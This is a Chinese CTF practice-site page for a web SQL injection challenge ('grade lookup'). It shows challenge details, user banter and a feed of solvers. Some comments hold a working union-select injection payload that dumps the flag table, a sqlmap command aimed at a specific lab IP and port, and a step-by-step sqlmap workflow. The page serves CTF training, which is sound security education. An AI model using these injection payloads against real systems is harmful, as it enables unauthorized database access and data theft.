成绩查询WEB 未解决

分数: 25 金币: 2
题目作者: 未知
一  血: npfs
一血奖励: 1金币
解  决: 12284
提  示:
描  述:
来源山科大ctf
评论
hmlpzm 2天前

kskbl

回复 0

donk6 3天前

胡俊胡俊杰你被捕了

回复 1
jay cat 3天前

熊金卫伤了你的小心脏?

回复 0

jay cat 3天前

都是同龄人,我原本没想降维打击

回复 2

WWls= 4天前

这么简单的注入题还有人用sqlmap别逗我笑了

回复 0
jay cat 3天前

豪到我了

回复 3

298617 16天前

qrb666

回复 1
mzjjkk 16天前

qrb999

回复 0

诗意黎明 17天前

哈吉米南北绿豆,哈哑鼓曼波

回复 1

ljy1997 28天前

说一下我的思路:1、随便输入1查询,发现会返回一个表格,怀疑有sql注入漏洞。 2、然后用kali自带的sqlmap工具,因为这个工具只能扫描.txt文件,所以先用bs抓包改post请求之后保存成txt文件。 3、sqlmap命令扫描,发现的确是sql注入漏洞。 4、结果里有一个ctf的数据库,肯定就在这儿了 5、接着扫描这个skctf发现里面有fl4g这个表。 6、接着扫描,出结果。

回复 2

Galaxies2580 1月前

为什么打不开靶机网址,显示无法访问

回复 0

叶澜 3月前

sqlmap -u "http://171.80.2.169:11993/" --forms -D skctf --dump

回复 0

lovehhh 5月前

1' and 1=2 union select group_concat(skctf_flag),2,3,4 from fl4g;#--

回复 8

WriteUp

image
harry

2 金币

评分(25)

解题动态

薄言. 攻破了该题 10小时前
yokoi 攻破了该题 11小时前
18785002668 攻破了该题 16小时前
kkctf 攻破了该题 1天前
fish12139 攻破了该题 1天前
Schen 攻破了该题 1天前
渐入佳境 攻破了该题 1天前
111119999 攻破了该题 1天前
少年,你的剑太重了 攻破了该题 2天前
店晓贰 攻破了该题 2天前
8831 攻破了该题 2天前
13822005976 攻破了该题 2天前
pkouki 攻破了该题 3天前
张云天 攻破了该题 3天前
yfy 攻破了该题 3天前
CQYXX 攻破了该题 3天前
众长生 攻破了该题 3天前
donk6 攻破了该题 3天前
.tang 攻破了该题 3天前
晚风叙 攻破了该题 3天前
问题反馈